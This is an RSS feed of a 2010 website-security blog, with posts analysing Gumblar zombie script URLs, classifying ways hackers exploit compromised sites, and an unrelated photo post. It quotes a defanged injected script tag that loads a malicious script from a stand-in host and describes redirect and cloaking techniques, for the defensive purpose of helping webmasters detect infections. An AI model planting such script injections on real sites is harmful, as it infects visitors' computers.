<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Unmask Parasites. Blog. &#187; General</title>
	<atom:link href="http://blog.unmaskparasites.com/category/general/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Thu, 29 Jul 2010 19:20:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Analysis of Gumblar Zombie URLs</title>
		<link>http://blog.unmaskparasites.com/2010/06/29/analysis-of-gumblar-zombie-urls/</link>
		<comments>http://blog.unmaskparasites.com/2010/06/29/analysis-of-gumblar-zombie-urls/#comments</comments>
		<pubDate>Tue, 29 Jun 2010 16:29:34 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Website exploits]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[gifimg.php]]></category>
		<category><![CDATA[gumblar]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=650</guid>
		<description><![CDATA[As you might know, I maintain and regularly update a list of Gumblar zombie URLs. The main reason why I do it is to help webmasters of compromised sites find relevant information about the source of their problems and the steps required to clean up and secure their sites. I see this pattern quite often, [...]]]></description>
			<content:encoded><![CDATA[<p>As you might know, I maintain and regularly update a <a href="http://blog.unmaskparasites.com/2009/12/18/list-of-gumblar-zombie-urls/">list of Gumblar zombie URLs</a>. The main reason why I do it is to help webmasters of compromised sites find relevant information about the source of their problems and the steps required to <a href="http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/#detection">clean up and secure their sites</a>. I see this pattern quite often, when webmasters find a suspicious script in their web pages and use it in Google searches to find more information about it. On the other hand, this list can also help reveal the security breach of sites that hackers use to host Gumblar zombie scripts.</p>
<p>This week the list has reached the level of <strong>1,000+</strong> URLs. Although it&#8217;s just a small part of all Gumblar zombie scripts, this list makes a good base for a quick analysis of Gumblar zombie URLs.<br />
<span id="more-650"></span></p>
<h3>What is a Gumblar zombie script?</h3>
<p>On some compromised websites, Gumblar creates  a new file with  a .<em><span style="color: #303030;"><strong>php</strong></span></em> extension. A link to this file is injected to other compromised sites.</p>
<p><code>&lt;script src=hxxp://hacked-site.com/subdirectory/zombie-script.php &gt;&lt;/script&gt;</code></p>
<p>This script either tries to attack web surfers&#8217; computer silently loading binary exploit files from the same zombie site, or load yet another zombie script from a third-party zombie site.</p>
<p>The zombie scripts are not linked to from any existing files on the same zombie site. Their are hidden somewhere in the directory structure and have names that look very trustworthy to site owners (they usually have a name of some existing legitimate file but with a .<em><span style="color: #333333;"><strong>php</strong></span></em> extension). This is why webmasters of compromised sites (Gumblars zombies) are usually completely unaware of such scripts on their sites (and as a result they are usually puzzled over why Google has blacklisted their sites and says their sites host malicious content and infect other sites). Although my <a href="http://blog.unmaskparasites.com/2009/12/18/list-of-gumblar-zombie-urls/">list</a> is not complete, it helps webmasters locate zombie scripts on their sites.</p>
<p>And the below analysis of  this list reveals interesting details both about the Gumblar attack and about its zombie URLs.</p>
<h3>Analysis</h3>
<p>I analyzed <span style="color: #333333;"><strong>1042</strong></span> Gumblar zombie URL.</p>
<h4>Top level domains</h4>
<p>The attack affects sites all over the world. My list contains sites with <span style="color: #333333;"><strong>73</strong></span> different top level domains. Of course, <span style="color: #333333;"><strong>.com</strong></span> sites (as the most wide-spread) are the most affected.</p>
<p><code>------------------- Top 10 TLDs ---------------------<br />
<span style="color: #808080;">1</span> .com                               452      43.4%<br />
<span style="color: #808080;">2</span> .net                                77       7.4%<br />
<span style="color: #808080;">3</span> .ru                                 57       5.5%<br />
<span style="color: #808080;">4</span> .org                                48       4.6%<br />
<span style="color: #808080;">5</span> .hu                                 37       3.6%<br />
<span style="color: #808080;">6</span> .de                                 32       3.1%<br />
<span style="color: #808080;">7</span> .in                                 25       2.4%<br />
<span style="color: #808080;">8</span> .pl                                 23       2.2%<br />
<span style="color: #808080;">9</span> .kr                                 23       2.2%<br />
<span style="color: #808080;">10</span> .ar                                 17       1.6%<br />
<span style="color: #ffffff;">:</span> the rest                           251      24.1%<br />
</code></p>
<div style="margin-bottom: 12px; margin-top: 12px; text-align: center;"><img src="http://chart.apis.google.com/chart?cht=p&amp;chs=360x290&amp;chd=t:452,77,57,48,37,32,25,23,23,17,251&amp;chds=0,452&amp;chl=.com|.net|.ru|.org|.hu|.de|.in|.pl|.kr|.ar|the+rest&amp;chtt=Top+10+TLDs" border="0" alt="Top 10 TLDs" /></div>
<h4>File names</h4>
<p><strong>1042</strong> URLs contain <strong>749</strong> unique filenames. As I already told you, the names are usually a combination of a name of some existing file and a <strong>.php</strong> extension. So no wonder, the most popular name of a zombie script is <em><strong>index.php</strong></em>. However, sometimes hackers use a filename (specific to the Gumblar attack) that doesn&#8217;t match any filenames of existing files &#8211; <em><strong>gifimg.php</strong></em>. It the the second most popular name of Gumblar zombie scripts.</p>
<p><code>---------------- Top 10 Filenames -------------------<br />
<span style="color: #808080;">1</span> index.php                           73       7.0%<br />
<span style="color: #808080;">2</span> gifimg.php                          55       5.3%<br />
<span style="color: #808080;">3</span> contact.php                         13       1.2%<br />
<span style="color: #808080;">4</span> style.php                            9       0.9%<br />
<span style="color: #808080;">5</span> error_log.php                        8       0.8%<br />
<span style="color: #808080;">6</span> _vti_inf.php                         8       0.8%<br />
<span style="color: #808080;">7</span> LICENSE.php                          8       0.8%<br />
<span style="color: #808080;">8</span> favicon.php                          7       0.7%<br />
<span style="color: #808080;">9</span> .ftpquota.php                        7       0.7%<br />
<span style="color: #808080;">10</span> robots.php                           7       0.7%<br />
<span style="color: #ffffff;">:</span> the rest                           847      81.3%</code></p>
<div style="margin-bottom: 12px; margin-top: 12px; text-align: center;"><img src="http://chart.apis.google.com/chart?cht=p&amp;chs=450x300&amp;chd=t:847,73,55,13,9,8,8,8,7,7,7&amp;chds=0,847&amp;chl=the+rest|index.php|gifimg.php|contact.php|style.php|error_log.php|_vti_inf.php|LICENSE.php|favicon.php|.ftpquota.php|robots.php&amp;chtt=Top+10+Filenames" border="0" alt="Top 10 Filenames" /></div>
<h4>Directories</h4>
<p>To make zombie scripts less prominent, hackers create them in subdirectories of hacked sites. In my list of <strong>1042</strong> URLs I found <strong>562</strong> unique paths (excluding filenames) to the rogue scripts. The most popular location of Gumblar zombie scripts is the <strong>/images</strong> directory (<strong>16.5%</strong>). It&#8217;s a very good location to hide malicious files &#8212; webmasters rarely check directories with image files when they are searching for something that can contain executable code. Moreover, if a file has some benign filename (e.g. <em><strong>gifimg</strong></em>) it can be easily overlooked. Other service directories (e.g. <em>/cgi-bin</em>, <em>/_vti_bin</em>, <em>/css</em>, <em>/tmp</em>, <em>/js</em>) are also among popular locations.</p>
<p>The tenth position is empty. This means that in less than <strong>1%</strong> of cases the zombie script was found directly in the site root directory.</p>
<p><code>----------------- Top 10 directories ----------------<br />
<span style="color: #808080;">1</span> /images                            172      16.5%<br />
<span style="color: #808080;">2</span> /cgi-bin                            24       2.3%<br />
<span style="color: #808080;">3</span> /_vti_bin                           21       2.0%<br />
<span style="color: #808080;">4</span> /css                                18       1.7%<br />
<span style="color: #808080;">5</span> /img                                15       1.4%<br />
<span style="color: #808080;">6</span> /tmp                                13       1.2%<br />
<span style="color: #808080;">7</span> /wp-content                         12       1.2%<br />
<span style="color: #808080;">8</span> /js                                 10       1.0%<br />
<span style="color: #808080;">9</span> /wp-admin                           10       1.0%<br />
<span style="color: #808080;">10</span> 9       0.9%<br />
<span style="color: #ffffff;">:</span> the rest                           738      70.8%<br />
</code></p>
<div style="margin-bottom: 12px; margin-top: 12px; text-align: center;"><img src="http://chart.apis.google.com/chart?cht=p&amp;chs=450x300&amp;chd=t:738,172,24,21,18,15,13,12,10,10,9&amp;chds=0,738&amp;chl=the+rest|/images|/cgi-bin|/_vti_bin|/css|/img|/tmp|/wp-content|/js|/wp-admin|/&amp;chtt=Top+10+Directories" border="0" alt="Top 10 directories" /></div>
<h4>Subdirectory levels</h4>
<p>In majority of cases (<strong>91.5%</strong>), zombie scripts can be found in a subdirectory one level deep. E.g. <em><strong>/images/</strong>zombie.php</em>, <em><strong>/tmp/</strong>zombie.php</em>, etc. However, sometimes their location is as deep as <strong>3</strong> levels from site root. E.g. <em><strong>/_flash/_notes/vz29/</strong>zombie.php</em>. In nine cases (&lt;<strong>1%</strong>),  zombie scripts were found in a root directory (<strong>0</strong> levels deep)<br />
<code>---------- Location relative to site root -----------<br />
<span style="color: #808080;">1</span> 1 level deep                      953      91.5%<br />
<span style="color: #808080;">2</span> 2 levels deep                      56       5.4%<br />
<span style="color: #808080;">3</span> 3 levels deep                      24       2.3%<br />
<span style="color: #808080;">4</span> 0 levels deep                       9       0.9%</code></p>
<div style="margin-bottom: 12px; margin-top: 12px; text-align: center;"><img src="http://chart.apis.google.com/chart?cht=p&amp;chs=450x300&amp;chd=t:953,56,24,9&amp;chds=0,738&amp;chl=1+level+deep|2+levels+deep|3+levels+deep|0+level+deep&amp;chtt=Location+relative+to+site+root" border="0" alt="Location relative to site root" /></div>
<h3>Web servers</h3>
<p>Gumblar uses <a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/">stolen FTP credentials</a> to break into web sites. This means that regardless of web server technology any site is potentially vulnerable to this sort of attack (as long as webmasters use FTP). My list of Gumblar zombie URLs provide enough evidence to prove this. You can find filenames and directories specific to different web server technologies.</p>
<p>For example:  <em><strong> </strong></em></p>
<ul>
<li><em><strong>.htaccess.php</strong></em> files  &#8212; <a href="http://httpd.apache.org/" target="_blank">Apache</a></li>
<li><em><strong>_vti_bin</strong></em> directories and <em><strong>_vti_inf.php</strong></em> files &#8212; sites powered by Microsoft technologies</li>
<li><strong><em>WEB-INF/classes/v7j/servertest.class.php</em></strong> &#8212; <a href="http://tomcat.apache.org/">Tomcat</a></li>
</ul>
<h3>&#8220;s&#8221; directories</h3>
<p>On many websites, next to a Gumblar zombie script there is a directory called <em><strong>s</strong></em>. It contains Gumblar service and log files. If you find it on your server, make sure to delete it.</p>
<h3>Have your say</h3>
<p>Did you notice any other interesting patterns in the<a href="http://blog.unmaskparasites.com/2009/12/18/list-of-gumblar-zombie-urls/"> list of Gumblar zombie URLs</a>? Your comments are welcome!</p>
<p><span style="color: #999999;"><strong>Related posts:</strong></span></p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/12/18/list-of-gumblar-zombie-urls/">List of Gumblar Zombie URLs</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/">Revenge  of Gumblar Zombies</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">Gumblar  .cn Exploit – 12 Facts About This Injected Script</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/">10  FTP Clients Malware Steals Credentials From</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2010/06/29/analysis-of-gumblar-zombie-urls/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>At Google&#8217;s Office in Moscow</title>
		<link>http://blog.unmaskparasites.com/2010/06/19/at-googles-office-in-moscow/</link>
		<comments>http://blog.unmaskparasites.com/2010/06/19/at-googles-office-in-moscow/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 19:53:47 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=641</guid>
		<description><![CDATA[
My visit to Google, Moscow last week ;)
]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.unmaskparasites.com/wp-content/uploads/2010/06/g3.jpg"><img src="http://blog.unmaskparasites.com/wp-content/uploads/2010/06/g4.jpg" alt="At Google's Office in Moscow" /></a></p>
<p>My visit to Google, Moscow last week ;)</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2010/06/19/at-googles-office-in-moscow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Introduction to Website Parasites</title>
		<link>http://blog.unmaskparasites.com/2010/04/14/introduction-to-website-parasites/</link>
		<comments>http://blog.unmaskparasites.com/2010/04/14/introduction-to-website-parasites/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 15:05:27 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Unmask Parasites]]></category>
		<category><![CDATA[awareness]]></category>
		<category><![CDATA[classification]]></category>
		<category><![CDATA[parasitism]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=602</guid>
		<description><![CDATA[Wikipedia defines Parasitism as a &#8220;type of symbiotic relationship  between organisms of different species in which one, the parasite, benefits from a prolonged, close association  with the other, the host, which is harmed.&#8221;
This definition perfectly describes relationships between hackers and legitimate websites. As it often happens in real life, the host (legitimate website [...]]]></description>
			<content:encoded><![CDATA[<p>Wikipedia defines <a href="http://en.wikipedia.org/wiki/Parasite" target="_blank">Parasitism</a> as a <em>&#8220;type of symbiotic relationship  between organisms of different species in which one, the parasite, benefits from a prolonged, close association  with the other, the host, which is harmed.&#8221;</em></p>
<p>This definition perfectly describes relationships between hackers and legitimate websites. As it often happens in real life, the host (legitimate website and its owner) may be completely unaware  of parasites until the harmful effect becomes obvious (e.g. drops in traffic, lost  search engine rankings, site gets blacklisted, etc. ).  And it doesn&#8217;t matter how big or small your site is and how malicious the hack is &#8211; this is the sort of relationships where parasites (hackers) always win and legitimate websites always lose.</p>
<p>As a webmaster, you can be more effective at detecting and mitigating parasitic activities if you know how hackers can benefit from your site .<br />
<span id="more-602"></span></p>
<h3>Types of website parasitism</h3>
<ol>
<li><a href="#traffic">Parasitism on existing site traffic</a></li>
<li><a href="#search">Parasitism on search traffic</a></li>
<li><a href="#ranking">Parasitism on sites search engine ranking (Black-hat SEO)</a></li>
<li><a href="#resources">Parasitism on server resources</a></li>
</ol>
<h4 id="traffic">1. Parasitism on existing site traffic.</h4>
<p><span style="color: #333333;"><strong>How hackers benefit from a prolonged, close association with compromised websites?</strong></span><strong><br />
</strong>If hackers incorporate some malicious content into legitimate websites, they can expose all visitors to those sites to their attacks. This is very cost effective since the infection process is fully automated (infected computers-zombies do all the dirty work) and they get all the traffic of compromised websites for free (while it is not free for the site owners who pay for hosting, create content, pay for ads, etc.). Since the cost of website infection is very low, hackers are targeting every website regardless of its size and content. This way they have infected thousands of web sites and millions of web pages.</p>
<p><span style="color: #333333;"><strong>Examples:</strong></span></p>
<ul>
<li><strong>Hidden iframes</strong> &#8211; Injecting hidden malicious iframes into compromised legitimate websites  is one of the most popular types of malware attacks. Invisible iframes  allow to silently load exploits from “bad” sites while unsuspecting web  surfers browsing visible content of infected websites. <a href="http://blog.unmaskparasites.com/2009/10/28/evolution-of-hidden-iframes/ ">More&#8230;</a><br />
<a href="http://blog.unmaskparasites.com/tag/iframe/">Posts about attacks that inject hidden frames</a></li>
<li><strong>Malicious scripts</strong> &#8211; Also a very popular type of malware attacks that allows to create hidden iframes on the fly or redirect visitors to third-party sites.<br />
<a href="http://blog.unmaskparasites.com/tag/obfuscated-script/">Posts about attacks that inject malicious scripts</a></li>
<li><strong>Rogue web servers</strong> &#8211; server-wide hacks that hijack web server processes and serve malicious content (usually redirects to rogue sites) instead of requested web pages. Such attack may be intermittent and very hard to detect. You can read about them in the following articles:<br />
<a href="http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/">Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects</a>.<br />
<a href="http://blog.unmaskparasites.com/2009/06/18/beladen-elusive-web-server-exploit/">Beladen – Elusive Web Server Exploit. (information for site owners and hosting providers)</a><br />
<a href="http://blog.unmaskparasites.com/tag/beladen/">More&#8230;</a></li>
</ul>
<p><span style="color: #333333;"><strong>How compromised websites are harmed?</strong></span></p>
<ul>
<li>sites get blacklisted</li>
<li>lose traffic (blocked by security tools or redirected by malware)</li>
<li>lose reputation when visitors see AV and Safe-Browsing warnings.</li>
<li>as a result, they lose sales and revenues from ads.</li>
</ul>
<h4 id="search">2. Parasitism on search traffic</h4>
<p><span style="color: #333333;"><strong>How  hackers benefit from a prolonged, close association with compromised  websites?</strong></span></p>
<p>Sometimes hackers target only site visitors who come from search engines. This way they make the hack detection more difficult to site owners who rarely need search engine to open their own websites. In this case, hackers are the only ones who benefit from site owners&#8217; efforts to improve search engine rankings.</p>
<p><span style="color: #333333;"><strong>Examples:</strong></span></p>
<ul>
<li><strong>.htaccess redirects</strong> &#8211; On Apache-powered sites, hackers inject conditional rewrite rules to redirect traffic from major search engine to malicious sites (usually to scareware sites).<br />
<a href="http://blog.unmaskparasites.com/tag/htaccess/">Posts about attacks that use malicious .htaccess redirects</a>.</li>
<li><strong>PHP redirects</strong> &#8211; injected PHP code can redirect searchers to third-party pay-per-click search engines that share revenue with hackers (<a href="http://blog.unmaskparasites.com/2010/04/11/network-solutions-and-wordpress-security-flaw/#webeasysearch">example</a>).</li>
</ul>
<p><span style="color: #333333;"><strong>How  compromised websites are harmed?</strong></span></p>
<ul>
<li>regardless of search engine rankings, compromised websites don&#8217;t receive any visitors from search engines (they are immediately redirected to third-party websites)</li>
<li>eventually, sites get blacklisted</li>
<li>lose natural traffic (blocked by security tools)</li>
<li>lose reputation when visitors see AV and Safe-Browsing warnings in search results.</li>
<li>as a result, they lose sales and revenues from ads.</li>
</ul>
<h4 id="ranking">3. Parasitism on sites search engine ranking (Black-hat SEO)</h4>
<p><span style="color: #333333;"><strong>How   hackers benefit from a prolonged, close association with compromised   websites?</strong></span></p>
<p>The more descriptive links from reputable sites point to some web page the higher its ranking for relevant keywords. This principle is abused by hackers who inject spammy links into legitimate websites to promote their shady web resources (online stores selling counterfeit and pirated goods, porn sites, scam sites). In this case, hackers benefit from existing search engine ranking (PR) and authority of the compromised sites that they share with the spammy sites.</p>
<p><span style="color: #333333;"><strong>Examples:</strong></span></p>
<ul>
<li><strong>Hidden links</strong> &#8211; the most simple attack that injects malicious links into legitimate webpages and uses HTML tricks to make them invisible to human visitors.<br />
<a href="http://blog.unmaskparasites.com/tag/hidden-links/">Posts about attacks that inject hidden links</a></li>
<li><strong>Cloaking</strong> &#8211; more elaborate attacks, that serve different versions of web pages to normal visitors (legitimate web pages) and to search engine spiders (either modified web pages with injected spammy links or completely different spammy pages) .  A lot of reputable sites have been affected by this sort of parasites:<br />
<a href="http://blog.unmaskparasites.com/2009/10/01/cheap-vista-or-cloaked-spam-on-high-profile-sites/">“Cheap Vista” or Cloaked Spam on High-Profile Sites</a><br />
<a href="http://blog.unmaskparasites.com/2009/10/03/anti-pirates-unknowingly-promote-pirates/">Anti-Pirates Unknowingly Promote Pirates</a></li>
<li><strong>Rogue 301 redirects</strong> &#8211; When Google sees redirects with the <span style="color: #333333;"><strong>301</strong></span> status code, it thinks that a website has permanently moved to another location. So it updates the site listing with the new location. Moreover, the new site automatically gains ranking of the original site. To steal ranking and search traffic from legitimate sites, hackers create conditional redirect rules (either in .htaccess files or in PHP scripts) that return the 301 status code along with the address of a malicious site for requests from search engine spiders. You can read the following posts about such attacks and their consequences:<br />
<a href="http://blog.unmaskparasites.com/2009/01/19/exploit-redirects-googlebot-to-malware-sites-bablo-me-uk/">Exploit Redirects Googlebot to Malware Sites (Bablo me uk).</a><br />
<a href="http://blog.unmaskparasites.com/2009/02/05/stats-anomaly-reveals-website-security-issues/">Stats Anomaly Reveals Website Security Issues.</a></li>
</ul>
<p><span style="color: #333333;"><strong>How   compromised websites are harmed?</strong></span></p>
<ul>
<li>The increased number of links dilutes the SEO value of web pages, which makes legitimate links less valuable SEO-wise.</li>
<li>Black-hat SEO tricks inevitably lead to penalties and exclusion from search results, which usually means drop in traffic and revenues.</li>
<li>Hidden links may affect contextual ads on compromised sites.</li>
<li>Cloaked content makes it to site description in search results and people who search for you site name may see something like &#8220;<em>Viagra Online &#8211; Buy Viagra Online &#8211; Cheapest Viagra On The Net</em>&#8221; or even something pornographic next to your site link. Such thing can only harm your reputation (especially for sites of schools, churches, reputable international organizations &#8211; which I see quite often).</li>
<li>Cloaked content replaces legitimate content in search index, and compromised web sites can no longer be found using relevant keywords.</li>
</ul>
<h4 id="resources">4. Parasitism on server resources.</h4>
<p><span style="color: #333333;"><strong>How    hackers benefit from a prolonged, close association with compromised    websites?</strong></span></p>
<p>Sometimes hackers are not interested in existing content, ranking of compromised websites and their visitors. All they need is free web space and server resources &#8211; something that they can share with hacked legitimate websites whose owners unknowingly pay the bills both for themselves and for hackers.</p>
<p><span style="color: #333333;"><strong>Examples:</strong></span></p>
<ul>
<li><strong>Rogue pages</strong> &#8211; Deep in sub-directories of legitimate websites, hackers create thousands of web pages optimized for specific keywords to poison search results on major search engines. (usually something related to breaking news or some relatively unpopular keywords from the long tail &#8211; either way they have good chances to make it to the first page of search results).  Once search engines index those rogue pages and start to send search traffic their way (it usually only take a few hours) the pages start to expose visitors to some malicious content (usually redirects to scareware sites) :<br />
<a href="http://blog.unmaskparasites.com/2009/11/26/rogue-blogs-regirect-search-traffic-to-bogus-av-sites-part-1/">Rogue blogs redirect search traffic to bogus AV sites. Part 1.</a><br />
<a href="http://blog.unmaskparasites.com/2010/01/18/bety-php-oscommerce-hack-part-1/">Bety.php – osCommerce Hack. Part 1.</a><br />
<a href="http://blog.unmaskparasites.com/2010/01/26/bety-php-hack-part-2-black-hats-in-action/">Bety.php Hack. Part 2. Black Hats in Action.</a><br />
<a href="http://blog.unmaskparasites.com/2010/03/17/internals-of-rogue-blogs/">Internals of Rogue Blogs</a></li>
<li><strong>Phishing</strong> &#8211; To steal sensitive personal information hackers create rogue web pages that look exactly as login pages of banks and popular services (e.g. Facebook, PayPal, GMail, etc).  When they send out tons of spam emails asking people, for example, to change their passwords (I bet you received such emails) and specifying a link to that <a href="http://en.wikipedia.org/wiki/Phishing" target="_blank">phishing</a> page on a hacked site. As a result of such phishing campaigns, some people may not notice the forgery and provide hackers with their logins and passwords. And the hacked sites make it into blacklists of anti-phishing organizations&#8230;</li>
<li><strong>Gumblar</strong> &#8211; One of the most elaborate malware attack &#8211; Gumblar &#8211; tries  to use compromised websites to the fullest. Not only does it inject malicious scripts into legitimate web pages, it also creates subdirectories with binary exploits and malicious scripts that hackers use to infect visitors to other sites. Moreover, the backdoor scripts on infected sites are used to break into new sites and infect them.  Gumblar-infected sites act as zombies of some botnet.<br />
<a href="http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/">Revenge of Gumblar Zombies</a><br />
<a href="http://blog.unmaskparasites.com/2009/12/18/list-of-gumblar-zombie-urls/">List of Gumblar Zombie URLs</a><br />
<a href="http://blog.unmaskparasites.com/tag/gumblar/">More&#8230;</a></li>
<li><strong>Koobface</strong> &#8211; This attack, that primarily targets users of social networking sites, <a href="http://blog.unmaskparasites.com/2010/02/27/web-of-koobface/">creates scripts in subdirectories of hacked legitimate sites</a> that redirect victims of the attack further to malicious web pages on infected computers.</li>
<li><strong>Reverse proxies on port 8080</strong> &#8211; To protect central malicious servers and keep them invisible to security researchers, hackers hide the real sources of badness behind reverse proxies on compromised web servers. Most hidden iframes with URLs that use port <strong>8080</strong> are just reverse proxies that behind the scenes pull the malicious content from secret servers.<br />
<a href="http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/#comment-4168">One of such reverse proxies</a><br />
Attacks that use such reverse proxies:<br />
<a href="http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/">Dynamic DNS and Botnet of Zombie Web Servers</a><br />
<a href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/">From Hidden Iframes to Obfuscated Scripts</a><br />
<a href="http://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/">Quicksilver Malware Network</a></li>
</ul>
<p><span style="color: #333333;"><strong>How   compromised websites are harmed?</strong></span></p>
<ul>
<li>Sites get blacklisted because of malicious content they host.</li>
<li>Sites can be excluded from search results if hackers create spammy pages there.</li>
<li>Sites can be marked as phishing sites.</li>
<li>Everything above leads to traffic and revenue drops</li>
<li>Rogue content may exhaust site quotas and slow down server performance.</li>
<li>And after all, site owners pay for resource overage incurred by hacker activity.</li>
</ul>
<h3>Non-parasites</h3>
<p>Not all hacker attacks are parasitic in their nature (which doesn&#8217;t make them less malicious, of course)</p>
<ul>
<li><strong>Defacement</strong> &#8211; hackers replace/change legitimate content of websites to show everyone that the sites have been hacked. Usually it&#8217;s just a malicious mischief. It doesn&#8217;t involve  prolonged and close relationship with hacked sites.</li>
<li><strong>DoS/DDos attacks</strong> &#8211; <a href="http://en.wikipedia.org/wiki/DDoS">denial-of-service attacks</a> try to render targeted websites/servers unavailable, exhausting their computational resources with floods of external requests. The goal of such attacks is usually either to get rid off unwanted sites (competitors, rivals, etc.) or to have site owners pay some ransom to stop the attack. While DoS attack may be quite prolonged (and last several weeks), they are completely external and don&#8217;t involve any close association with the the targeted sites.</li>
<li><strong>Theft</strong> &#8211; Sometimes hackers break into websites to steal some protected information (e.g. database of clients)  or access premium content without paying for it.</li>
</ul>
<h3>Make knowledgeable decisions</h3>
<p>Now that you know why hackers break into legitimate websites and how they use them, you can make knowledgeable decisions about how to detect the hacks and what tools you should use. E.g. to find injected iframes and malicious scripts you should thoroughly look through the HTML code of your web pages; to detect cloaking, you should check what Google has indexed on your site; to detect redirects from search results, you should try to <a href="http://blog.unmaskparasites.com/2009/04/07/using-wget-to-detect-hijacked-search-engine-traffic/">spoof the Referer HTTP header with tools like wget</a>, etc.</p>
<h3>Unmask Parasites</h3>
<p>To provide webmasters with a more universal, quick and secure way to check their sites for signs of hacker activity I created <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> online service. It evolved during the last two years and proved to be a good starting point for detecting various types of website parasites: hidden links, iframes, malicious scripts, cloaking and conditional redirects.</p>
<p>It&#8217;s the tool that can help reveal the problem you were not aware of or provide a hint on where to look (or not to look) for the source of security problems you investigate. And it&#8217;s all in less than 30 seconds. Of course, Unmask Parasites can&#8217;t detect or correctly identify every security problem, but it&#8217;s just a first step in your investigation and you should have other more specialized tools in your toolkit as well.</p>
<p>If you haven&#8217;t tried Unmask Parasites yet, it&#8217;s time to <a href="http://www.UnmaskParasites.com">click this link</a> and check your site for parasites.</p>
<h3>Build awareness</h3>
<p>Did you learn anything new about website security threats? If yes, show this article to your fellow webmasters. The more we &#8211; webmasters &#8211; know about hackers, the less chance they have   of exploiting our sites behind our backs.</p>
<h3>Have your say</h3>
<p>Do you have any other examples of parasitic activities of hackers? I would love to hear about them. Your comments are welcome.</p>
<p><strong><span style="color: #888888;">Related posts:</span></strong></p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2008/12/01/lets-unmask-parasites/">Let’s Unmask Parasites</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/12/02/unmask-parasites-a-year-of-blogging/">Unmask Parasites. A Year of Blogging</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/04/22/vulnerability-advisories-for-third-party-scripts/">Vulnerability Advisories for Third-Party Scripts</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/">10 FTP Clients Malware Steals Credentials From</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2010/04/14/introduction-to-website-parasites/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Evict Hackers</title>
		<link>http://blog.unmaskparasites.com/2009/12/30/evict-hackers/</link>
		<comments>http://blog.unmaskparasites.com/2009/12/30/evict-hackers/#comments</comments>
		<pubDate>Wed, 30 Dec 2009 16:24:46 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Leaseweb]]></category>
		<category><![CDATA[mdvhost]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[OVH]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=489</guid>
		<description><![CDATA[Last week, I wrote about the latest mutation of the website hack that has been active (mostly in form of iframe injection) throughout this year.  I mentioned that for some reason all malicious domain names had been mapped to IP addresses on LeaseWeb and OVH networks. Moreover, LeaseWeb hosted a central site mdvhost .com [...]]]></description>
			<content:encoded><![CDATA[<p>Last week, I <a href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/">wrote about the latest mutation of the website hack</a> that has been active (mostly in form of iframe injection) throughout this year.  I mentioned that for some reason all malicious domain names had been mapped to IP addresses on <a href="http://www.leaseweb.com">LeaseWeb</a> and <a href="http://ovh.com">OVH</a> networks. Moreover, LeaseWeb hosted a central site <span style="color: #993300;"><em>mdvhost .com</em></span> (hidden behind reverse-proxies) for at least 3 months.<br />
<span id="more-489"></span></p>
<h3>LeaseWeb reaction</h3>
